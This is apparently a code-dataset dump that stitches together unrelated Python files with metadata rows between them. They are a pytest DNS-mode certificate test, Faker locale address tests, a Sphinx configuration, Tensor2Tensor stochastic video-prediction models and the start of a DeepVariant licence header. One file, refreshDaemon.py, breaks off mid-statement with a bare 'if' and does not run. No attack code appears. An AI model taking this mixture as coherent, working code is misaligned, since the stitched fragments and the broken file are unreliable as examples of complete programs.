# wait for a while if this is to be tested with test_pebble.py
# time.sleep(5)
_STAGING_DOMAIN = ['test-staging.xn--ihqz7no5gol3b.icu']
_STAGING_WILDCARD_DOMAIN = ['*.xn--ihqz7no5gol3b.icu']
_STAGING_MULTI_DOMAIN = [
'test-staging-1.xn--ihqz7no5gol3b.icu',
'test-staging-2.xn--ihqz7no5gol3b.icu',
]
_DNS_MODE_COMMON_PARAM_PORTION = dict(
contact=TEST_CONTACTS,
country_code='UN',
CA_entry=LETSENCRYPT_STAGING,
mode='dns',
)
_DNS_MODE_PEBBLE_PARAM: dict = _DNS_MODE_COMMON_PARAM_PORTION.copy()
_DNS_MODE_PEBBLE_PARAM.update(
dict(
CA_entry=PEBBLE_TEST,
no_ssl_verify=True,
)
)
dns_mode_params = [
pytest.param(
dict(domain=_STAGING_DOMAIN, **_DNS_MODE_COMMON_PARAM_PORTION),
id='dns_mode_single_domain'
),
pytest.param(
dict(domain=_STAGING_MULTI_DOMAIN, **_DNS_MODE_COMMON_PARAM_PORTION),
id='dns_mode_multi_domain'
),
pytest.param(
dict(domain=_STAGING_WILDCARD_DOMAIN, **_DNS_MODE_COMMON_PARAM_PORTION),
id='dns_mode_wildcard_domain'
),
]
@pytest.mark.dnstest
@pytest.mark.docker_type(None)
@pytest.mark.usefixtures('setup_pebble_docker')
class TestDNSMode:
@pytest.mark.parametrize('params', dns_mode_params)
def test_dns_mode(self, params, aliyun_access_key: Dict[str, str]):
key_dict = dict(
access_key=aliyun_access_key['access_key'],
secret=aliyun_access_key['secret']
)
params = dict(**params, **key_dict)
_common(params, ca='staging')
time.sleep(5)
@pytest.mark.dnstest_pebble
@pytest.mark.docker_type('standalone')
@pytest.mark.usefixtures('setup_pebble_docker')
class TestDNSModePebble:
@pytest.mark.parametrize('key_type', ['rsa', 'es256'])
def test_dns_mode_pebble(self, key_type, aliyun_access_key: Dict[str, str]):
key_dict = dict(
access_key=aliyun_access_key['access_key'],
secret=aliyun_access_key['secret']
)
params = dict(**_DNS_MODE_PEBBLE_PARAM, **key_dict)
params.update(dict(domain=_STAGING_DOMAIN, csr_priv_key_type=key_type))
_common(params, ca='pebble') | 31.232932 | 80 | 0.653208 |
06c29994832d9f048f21df9ff9f47ca094cb2c9e | 474 | py | Python | backend/refreshDaemon.py | linorallo/Product_Finder | 49ee6796eb661e0fa00546047f085ab6fc012eaf | [
"MIT"
] | null | null | null | backend/refreshDaemon.py | linorallo/Product_Finder | 49ee6796eb661e0fa00546047f085ab6fc012eaf | [
"MIT"
] | null | null | null | backend/refreshDaemon.py | linorallo/Product_Finder | 49ee6796eb661e0fa00546047f085ab6fc012eaf | [
"MIT"
] | null | null | null | import Product_Finder.backend.db as db
import Product_Finder.backend.dbScripts as dbScripts
from datetime import timedelta, datetime
def checkProductUpdates():
actualTime = datetime.now()
timeDelta= timedelta(hours=5)
timeLimit= actualTime-timeDelta
dateFormat = '%Y-%m-%d %H:%M:%S'
for item in dbScripts.retrieveAll() :
discoveredTime = datetime.strptime(item[5],dateFormat)
if discoveredTime - timeLimit :
if
| 33.857143 | 63 | 0.689873 |
6c68b964da68eba5ce98181b1db293b737b089dc | 9,843 | py | Python | tests/providers/test_address.py | xxf-liub/faker1 | c966a144b370f7abb568a5154c4ef704e846722e | [
"MIT"
] | 1 | 2022-01-07T03:34:39.000Z | 2022-01-07T03:34:39.000Z | tests/providers/test_address.py | Saber-xxf/faker1 | c966a144b370f7abb568a5154c4ef704e846722e | [
"MIT"
] | null | null | null | tests/providers/test_address.py | Saber-xxf/faker1 | c966a144b370f7abb568a5154c4ef704e846722e | [
"MIT"
] | null | null | null | # coding=utf-8
from __future__ import unicode_literals
import re
import unittest
from decimal import Decimal
from ukpostcodeparser.parser import parse_uk_postcode
from faker import Faker
from faker.providers.address.de_DE import Provider as DeProvider
from faker.providers.address.el_GR import Provider as GrProvider
from faker.providers.address.en_AU import Provider as EnAuProvider
from faker.providers.address.en_CA import Provider as EnCaProvider
from faker.providers.address.ja_JP import Provider as JaProvider
from faker.providers.address.ne_NP import Provider as NeProvider
from six import string_types
class TestDeDE(unittest.TestCase):
""" Tests in addresses in the de_DE locale """
def setUp(self):
self.factory = Faker('de_DE')
def test_city(self):
city = self.factory.city()
assert isinstance(city, string_types)
assert city in DeProvider.cities
def test_state(self):
state = self.factory.state()
assert isinstance(state, string_types)
assert state in DeProvider.states
def test_street_suffix_short(self):
street_suffix_short = self.factory.street_suffix_short()
assert isinstance(street_suffix_short, string_types)
assert street_suffix_short in DeProvider.street_suffixes_short
def test_street_suffix_long(self):
street_suffix_long = self.factory.street_suffix_long()
assert isinstance(street_suffix_long, string_types)
assert street_suffix_long in DeProvider.street_suffixes_long
def test_country(self):
country = self.factory.country()
assert isinstance(country, string_types)
assert country in DeProvider.countries
class TestElGR(unittest.TestCase):
""" Tests addresses in the el_GR locale """
def setUp(self):
self.factory = Faker('el_GR')
def test_line_address(self):
address = self.factory.line_address()
assert isinstance(address, string_types)
def test_city(self):
city = self.factory.city()
assert isinstance(city, string_types)
assert city in GrProvider.cities
def test_region(self):
region = self.factory.region()
assert isinstance(region, string_types)
assert region in GrProvider.regions
def test_latlng(self):
latlng = self.factory.latlng()
latitude = self.factory.latitude()
longitude = self.factory.longitude()
assert isinstance(latlng, tuple)
assert isinstance(latitude, Decimal)
assert isinstance(longitude, Decimal)
class TestEnAU(unittest.TestCase):
""" Tests addresses in the en_AU locale """
def setUp(self):
self.factory = Faker('en_AU')
def test_postcode(self):
for _ in range(100):
postcode = self.factory.postcode()
assert re.match("\d{4}", postcode)
def test_state(self):
state = self.factory.state()
assert isinstance(state, string_types)
assert state in EnAuProvider.states
def test_city_prefix(self):
city_prefix = self.factory.city_prefix()
assert isinstance(city_prefix, string_types)
assert city_prefix in EnAuProvider.city_prefixes
def test_state_abbr(self):
state_abbr = self.factory.state_abbr()
assert isinstance(state_abbr, string_types)
assert state_abbr in EnAuProvider.states_abbr
self.assertTrue(state_abbr.isupper())
class TestEnCA(unittest.TestCase):
""" Tests addresses in en_CA locale """
def setUp(self):
self.factory = Faker('en_CA')
def test_postalcode(self):
for _ in range(100):
postalcode = self.factory.postalcode()
assert re.match("[A-Z][0-9][A-Z] ?[0-9][A-Z][0-9]",
postalcode)
def test_postal_code_letter(self):
postal_code_letter = self.factory.postal_code_letter()
assert re.match("[A-Z]", postal_code_letter)
def test_province(self):
province = self.factory.province()
assert isinstance(province, string_types)
assert province in EnCaProvider.provinces
def test_province_abbr(self):
province_abbr = self.factory.province_abbr()
assert isinstance(province_abbr, string_types)
assert province_abbr in EnCaProvider.provinces_abbr
def test_city_prefix(self):
city_prefix = self.factory.city_prefix()
assert isinstance(city_prefix, string_types)
assert city_prefix in EnCaProvider.city_prefixes
def test_secondary_address(self):
secondary_address = self.factory.secondary_address()
assert isinstance(secondary_address, string_types)
class TestEnGB(unittest.TestCase):
""" Tests addresses in the en_GB locale """
def setUp(self):
self.factory = Faker('en_GB')
def test_postcode(self):
for _ in range(100):
assert isinstance(parse_uk_postcode(self.factory.postcode()), tuple)
class TestHuHU(unittest.TestCase):
""" Tests addresses in the hu_HU locale """
def setUp(self):
self.factory = Faker('hu_HU')
def test_postcode_first_digit(self):
# Hungarian postcodes begin with 'H-' followed by 4 digits.
# The first digit may not begin with a zero.
for _ in range(100):
pcd = self.factory.postcode()
assert pcd[2] > "0"
def test_street_address(self):
""" Tests the street address in the hu_HU locale """
address = self.factory.address()
assert isinstance(address, string_types)
address_with_county = self.factory.street_address_with_county()
assert isinstance(address_with_county, string_types)
class TestJaJP(unittest.TestCase):
""" Tests addresses in the ja_JP locale """
def setUp(self):
self.factory = Faker('ja')
def test_address(self):
""" Test"""
country = self.factory.country()
assert isinstance(country, string_types)
assert country in JaProvider.countries
prefecture = self.factory.prefecture()
assert isinstance(prefecture, string_types)
assert prefecture in JaProvider.prefectures
city = self.factory.city()
assert isinstance(city, string_types)
assert city in JaProvider.cities
town = self.factory.town()
assert isinstance(town, string_types)
assert town in JaProvider.towns
chome = self.factory.chome()
assert isinstance(chome, string_types)
assert re.match("\d{1,2}丁目", chome)
ban = self.factory.ban()
assert isinstance(ban, string_types)
assert re.match("\d{1,2}番", ban)
gou = self.factory.gou()
assert isinstance(gou, string_types)
assert re.match("\d{1,2}号", gou)
building_name = self.factory.building_name()
assert isinstance(building_name, string_types)
assert building_name in JaProvider.building_names
zipcode = self.factory.zipcode()
assert isinstance(zipcode, string_types)
assert re.match("\d{3}-\d{4}", zipcode)
address = self.factory.address()
assert isinstance(address, string_types)
class TestNeNP(unittest.TestCase):
""" Tests addresses in the ne_NP locale """
def setUp(self):
self.factory = Faker('ne_NP')
def test_address(self):
""" Tests the street address in ne_NP locale """
country = self.factory.country()
assert isinstance(country, string_types)
assert country in NeProvider.countries
district = self.factory.district()
assert isinstance(district, string_types)
assert district in NeProvider.districts
city = self.factory.city()
assert isinstance(city, string_types)
assert city in NeProvider.cities
class TestNoNO(unittest.TestCase):
""" Tests the street address in no_NO locale """
def setUp(self):
self.factory = Faker('no_NO')
def test_postcode(self):
for _ in range(100):
self.assertTrue(re.match(r'^[0-9]{4}$', self.factory.postcode()))
def test_city_suffix(self):
suffix = self.factory.city_suffix()
assert isinstance(suffix, string_types)
def test_street_suffix(self):
suffix = self.factory.street_suffix()
assert isinstance(suffix, string_types)
def test_address(self):
address = self.factory.address()
assert isinstance(address, string_types)
class TestZhTW(unittest.TestCase):
""" Tests addresses in the zh_tw locale """
def setUp(self):
self.factory = Faker('zh_TW')
def test_address(self):
country = self.factory.country()
assert isinstance(country, string_types)
street = self.factory.street_name()
assert isinstance(street, string_types)
city = self.factory.city()
assert isinstance(city, string_types)
address = self.factory.address()
assert isinstance(address, string_types)
class TestZhCN(unittest.TestCase):
""" Tests addresses in the zh_cn locale """
def setUp(self):
self.factory = Faker('zh_CN')
def test_address(self):
country = self.factory.country()
assert isinstance(country, string_types)
street = self.factory.street_name()
assert isinstance(street, string_types)
city = self.factory.street_address()
assert isinstance(city, string_types)
province = self.factory.province()
assert isinstance(province, string_types)
district = self.factory.district()
assert isinstance(district, string_types)
address = self.factory.address()
assert isinstance(address, string_types)
for _ in range(100):
self.assertTrue(re.match(r'\d{5}', self.factory.postcode()))
| 31.148734 | 80 | 0.670832 |
e507c3949cfaea19292c415b12235e869f3e8c86 | 7,768 | py | Python | docs/conf.py | boeddeker/cntk_helper | c13bf249d4576fbd90f3ac8efb262f54b462a386 | [
"MIT"
] | null | null | null | docs/conf.py | boeddeker/cntk_helper | c13bf249d4576fbd90f3ac8efb262f54b462a386 | [
"MIT"
] | null | null | null | docs/conf.py | boeddeker/cntk_helper | c13bf249d4576fbd90f3ac8efb262f54b462a386 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# cntk_helper documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'cntk_helper'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'cntk_helperdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'cntk_helper.tex',
u'cntk_helper Documentation',
u"cbj", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cntk_helper', u'cntk_helper Documentation',
[u"cbj"], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'cntk_helper', u'cntk_helper Documentation',
u"cbj", 'cntk_helper',
'A short description of the project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
| 31.706122 | 80 | 0.706874 |
5d3d7b7ed00f094f2efd15d41eadd314b25f8cab | 12,780 | py | Python | tensor2tensor/models/video/basic_stochastic.py | knarfamlap/tensor2tensor | f7e041d00e82e7d1bc2f3eb4dbf24cb246981ed8 | [
"Apache-2.0"
] | 2 | 2020-03-02T13:49:11.000Z | 2020-06-18T09:48:35.000Z | tensor2tensor/models/video/basic_stochastic.py | knarfamlap/tensor2tensor | f7e041d00e82e7d1bc2f3eb4dbf24cb246981ed8 | [
"Apache-2.0"
] | null | null | null | tensor2tensor/models/video/basic_stochastic.py | knarfamlap/tensor2tensor | f7e041d00e82e7d1bc2f3eb4dbf24cb246981ed8 | [
"Apache-2.0"
] | 1 | 2021-08-29T20:37:37.000Z | 2021-08-29T20:37:37.000Z | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Basic models for testing simple tasks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.layers import common_attention
from tensor2tensor.layers import common_layers
from tensor2tensor.layers import common_video
from tensor2tensor.layers import discretization
from tensor2tensor.models.video import base_vae
from tensor2tensor.models.video import basic_deterministic
from tensor2tensor.models.video import basic_deterministic_params
from tensor2tensor.utils import registry
import tensorflow as tf
tfl = tf.layers
@registry.register_model
class NextFrameBasicStochastic(
basic_deterministic.NextFrameBasicDeterministic,
base_vae.NextFrameBaseVae):
"""Stochastic version of basic next-frame model."""
def inject_latent(self, layer, inputs, target, action):
"""Inject a VAE-style latent."""
del action
# Latent for stochastic model
filters = 128
full_video = tf.stack(inputs + [target], axis=1)
latent_mean, latent_std = self.construct_latent_tower(
full_video, time_axis=1)
latent = common_video.get_gaussian_tensor(latent_mean, latent_std)
latent = tfl.flatten(latent)
latent = tf.expand_dims(latent, axis=1)
latent = tf.expand_dims(latent, axis=1)
latent_mask = tfl.dense(latent, filters, name="latent_mask")
zeros_mask = tf.zeros(
common_layers.shape_list(layer)[:-1] + [filters], dtype=tf.float32)
layer = tf.concat([layer, latent_mask + zeros_mask], axis=-1)
extra_loss = self.get_kl_loss([latent_mean], [latent_std])
return layer, extra_loss
@registry.register_model
class NextFrameBasicStochasticDiscrete(
basic_deterministic.NextFrameBasicDeterministic):
"""Basic next-frame model with a tiny discrete latent."""
@property
def is_recurrent_model(self):
return True
def init_internal_states(self):
if not self.hparams.concat_internal_states:
return None
# Hardcoded frame shapes.
max_batch_size = max(64, self.hparams.batch_size)
shape = [max_batch_size] + self.hparams.problem.frame_shape[:-1] + [
self.hparams.recurrent_state_size]
with tf.variable_scope("clean_scope_for_internal_state"):
v = tf.get_variable("state", shape, trainable=False,
initializer=tf.zeros_initializer())
return [[v]]
def reset_internal_states_ops(self):
if not self.hparams.concat_internal_states:
return [[tf.no_op()]]
zeros = [[tf.zeros_like(s)] for s in self.internal_states[0]]
return self.save_internal_states_ops(zeros)
def load_internal_states_ops(self):
if not self.hparams.concat_internal_states:
return [[tf.no_op()]]
ops = [[s.read_value()] for s in self.internal_states[0]]
return ops
def save_internal_states_ops(self, internal_states):
if not self.hparams.concat_internal_states:
return [[tf.no_op()]]
ops = [[tf.assign(x, y)]
for x, y in zip(self.internal_states[0], internal_states[0])]
return ops
def update_internal_states_early(self, internal_states, frames):
"""Update the internal states early in the network in GRU-like way."""
batch_size = common_layers.shape_list(frames[0])[0]
internal_state = internal_states[0][0][:batch_size, :, :, :]
state_activation = tf.concat([internal_state, frames[0]], axis=-1)
state_gate_candidate = tf.layers.conv2d(
state_activation, 2 * self.hparams.recurrent_state_size,
(3, 3), padding="SAME", name="state_conv")
state_gate, state_candidate = tf.split(state_gate_candidate, 2, axis=-1)
state_gate = tf.nn.sigmoid(state_gate)
state_candidate = tf.tanh(state_candidate)
internal_state = internal_state * state_gate
internal_state += state_candidate * (1.0 - state_gate)
max_batch_size = max(64, self.hparams.batch_size)
diff_batch_size = max_batch_size - batch_size
internal_state = tf.pad(
internal_state, [[0, diff_batch_size], [0, 0], [0, 0], [0, 0]])
return [[internal_state]]
def inject_latent(self, layer, inputs, target, action):
"""Inject a deterministic latent based on the target frame."""
hparams = self.hparams
final_filters = common_layers.shape_list(layer)[-1]
filters = hparams.hidden_size
kernel = (4, 4)
layer_shape = common_layers.shape_list(layer)
def add_bits(layer, bits):
z_mul = tfl.dense(bits, final_filters, name="unbottleneck_mul")
if not hparams.complex_addn:
return layer + z_mul
layer *= tf.nn.sigmoid(z_mul)
z_add = tfl.dense(bits, final_filters, name="unbottleneck_add")
layer += z_add
return layer
if not self.is_training:
if hparams.full_latent_tower:
rand = tf.random_uniform(layer_shape[:-1] + [hparams.bottleneck_bits])
bits = 2.0 * tf.to_float(tf.less(0.5, rand)) - 1.0
else:
bits, _ = discretization.predict_bits_with_lstm(
layer, hparams.latent_predictor_state_size, hparams.bottleneck_bits,
temperature=hparams.latent_predictor_temperature)
bits = tf.expand_dims(tf.expand_dims(bits, axis=1), axis=2)
return add_bits(layer, bits), 0.0
# Embed.
frames = tf.concat(inputs + [target], axis=-1)
x = tfl.dense(
frames, filters, name="latent_embed",
bias_initializer=tf.random_normal_initializer(stddev=0.01))
x = common_attention.add_timing_signal_nd(x)
# Add embedded action if present.
if action is not None:
x = common_video.inject_additional_input(
x, action, "action_enc_latent", hparams.action_injection)
if hparams.full_latent_tower:
for i in range(hparams.num_compress_steps):
with tf.variable_scope("latent_downstride%d" % i):
x = common_layers.make_even_size(x)
if i < hparams.filter_double_steps:
filters *= 2
x = common_attention.add_timing_signal_nd(x)
x = tfl.conv2d(x, filters, kernel,
activation=common_layers.belu,
strides=(2, 2), padding="SAME")
x = common_layers.layer_norm(x)
else:
x = common_layers.double_discriminator(x)
x = tf.expand_dims(tf.expand_dims(x, axis=1), axis=1)
bits, bits_clean = discretization.tanh_discrete_bottleneck(
x, hparams.bottleneck_bits, hparams.bottleneck_noise,
hparams.discretize_warmup_steps, hparams.mode)
if not hparams.full_latent_tower:
_, pred_loss = discretization.predict_bits_with_lstm(
layer, hparams.latent_predictor_state_size, hparams.bottleneck_bits,
target_bits=bits_clean)
# Mix bits from latent with predicted bits on forward pass as a noise.
if hparams.latent_rnn_max_sampling > 0.0:
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
bits_pred, _ = discretization.predict_bits_with_lstm(
layer, hparams.latent_predictor_state_size,
hparams.bottleneck_bits,
temperature=hparams.latent_predictor_temperature)
bits_pred = tf.expand_dims(tf.expand_dims(bits_pred, axis=1), axis=2)
# Be bits_pred on the forward pass but bits on the backward one.
bits_pred = bits_clean + tf.stop_gradient(bits_pred - bits_clean)
# Select which bits to take from pred sampling with bit_p probability.
which_bit = tf.random_uniform(common_layers.shape_list(bits))
bit_p = common_layers.inverse_lin_decay(hparams.latent_rnn_warmup_steps)
bit_p *= hparams.latent_rnn_max_sampling
bits = tf.where(which_bit < bit_p, bits_pred, bits)
res = add_bits(layer, bits)
# During training, sometimes skip the latent to help action-conditioning.
res_p = common_layers.inverse_lin_decay(hparams.latent_rnn_warmup_steps / 2)
res_p *= hparams.latent_use_max_probability
res_rand = tf.random_uniform([layer_shape[0]])
res = tf.where(res_rand < res_p, res, layer)
return res, pred_loss
@registry.register_hparams
def next_frame_basic_stochastic():
"""Basic 2-frame conv model with stochastic tower."""
hparams = basic_deterministic_params.next_frame_basic_deterministic()
hparams.stochastic_model = True
hparams.add_hparam("latent_channels", 1)
hparams.add_hparam("latent_std_min", -5.0)
hparams.add_hparam("num_iterations_1st_stage", 15000)
hparams.add_hparam("num_iterations_2nd_stage", 15000)
hparams.add_hparam("latent_loss_multiplier", 1e-3)
hparams.add_hparam("latent_loss_multiplier_dynamic", False)
hparams.add_hparam("latent_loss_multiplier_alpha", 1e-5)
hparams.add_hparam("latent_loss_multiplier_epsilon", 1.0)
hparams.add_hparam("latent_loss_multiplier_schedule", "constant")
hparams.add_hparam("latent_num_frames", 0) # 0 means use all frames.
hparams.add_hparam("anneal_end", 50000)
hparams.add_hparam("information_capacity", 0.0)
return hparams
@registry.register_hparams
def next_frame_sampling_stochastic():
"""Basic 2-frame conv model with stochastic tower."""
hparams = basic_deterministic_params.next_frame_sampling()
hparams.stochastic_model = True
hparams.add_hparam("latent_channels", 1)
hparams.add_hparam("latent_std_min", -5.0)
hparams.add_hparam("num_iterations_1st_stage", 15000)
hparams.add_hparam("num_iterations_2nd_stage", 15000)
hparams.add_hparam("latent_loss_multiplier", 1e-3)
hparams.add_hparam("latent_loss_multiplier_dynamic", False)
hparams.add_hparam("latent_loss_multiplier_alpha", 1e-5)
hparams.add_hparam("latent_loss_multiplier_epsilon", 1.0)
hparams.add_hparam("latent_loss_multiplier_schedule", "constant")
hparams.add_hparam("latent_num_frames", 0) # 0 means use all frames.
hparams.add_hparam("anneal_end", 40000)
hparams.add_hparam("information_capacity", 0.0)
return hparams
@registry.register_hparams
def next_frame_basic_stochastic_discrete():
"""Basic 2-frame conv model with stochastic discrete latent."""
hparams = basic_deterministic_params.next_frame_sampling()
hparams.batch_size = 4
hparams.video_num_target_frames = 6
hparams.scheduled_sampling_mode = "prob_inverse_lin"
hparams.scheduled_sampling_decay_steps = 40000
hparams.scheduled_sampling_max_prob = 1.0
hparams.dropout = 0.15
hparams.filter_double_steps = 3
hparams.hidden_size = 96
hparams.learning_rate_constant = 0.002
hparams.learning_rate_warmup_steps = 2000
hparams.learning_rate_schedule = "linear_warmup * constant"
hparams.concat_internal_states = True
hparams.video_modality_loss_cutoff = 0.03
hparams.add_hparam("bottleneck_bits", 128)
hparams.add_hparam("bottleneck_noise", 0.1)
hparams.add_hparam("discretize_warmup_steps", 40000)
hparams.add_hparam("latent_rnn_warmup_steps", 40000)
hparams.add_hparam("latent_rnn_max_sampling", 0.5)
hparams.add_hparam("latent_use_max_probability", 0.8)
hparams.add_hparam("full_latent_tower", False)
hparams.add_hparam("latent_predictor_state_size", 128)
hparams.add_hparam("latent_predictor_temperature", 1.0)
hparams.add_hparam("complex_addn", True)
hparams.add_hparam("recurrent_state_size", 64)
return hparams
@registry.register_hparams
def next_frame_basic_stochastic_discrete_long():
"""Conv model with stochastic discrete latent, long predictions."""
hparams = next_frame_basic_stochastic_discrete()
hparams.batch_size = 2
hparams.video_num_target_frames = 16
return hparams
@registry.register_ranged_hparams
def next_frame_stochastic_discrete_range(rhp):
"""Next frame stochastic discrete tuning grid."""
rhp.set_float("learning_rate_constant", 0.001, 0.01)
rhp.set_float("dropout", 0.2, 0.6)
rhp.set_int("filter_double_steps", 3, 5)
rhp.set_discrete("hidden_size", [64, 96, 128])
rhp.set_discrete("bottleneck_bits", [32, 64, 128, 256])
rhp.set_discrete("video_num_target_frames", [4])
rhp.set_float("bottleneck_noise", 0.0, 0.2)
@registry.register_ranged_hparams
def next_frame_stochastic_discrete_latent_range(rhp):
rhp.set_float("latent_rnn_max_sampling", 0.1, 0.9)
rhp.set_float("latent_predictor_temperature", 0.1, 1.2)
rhp.set_float("latent_use_max_probability", 0.4, 1.0)
rhp.set_float("dropout", 0.1, 0.4)
| 41.493506 | 80 | 0.736933 |
576acdeffa5868403b96b5ac1bdd4a2d2445eb90 | 9,393 | py | Python | deepvariant/realigner/window_selector.py | fabbondanza/deepvariant | c0820eb6b185c612555a80febf89d761c383fafd | [
"BSD-3-Clause"
] | 1 | 2019-05-20T11:55:45.000Z | 2019-05-20T11:55:45.000Z | deepvariant/realigner/window_selector.py | fabbondanza/deepvariant | c0820eb6b185c612555a80febf89d761c383fafd | [
"BSD-3-Clause"
] | null | null | null | deepvariant/realigner/window_selector.py | fabbondanza/deepvariant | c0820eb6b185c612555a80febf89d761c383fafd | [
"BSD-3-Clause"
] | 1 | 2017-12-06T17:30:18.000Z | 2017-12-06T17:30:18.000Z | # Copyright 2017 Google LLC.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
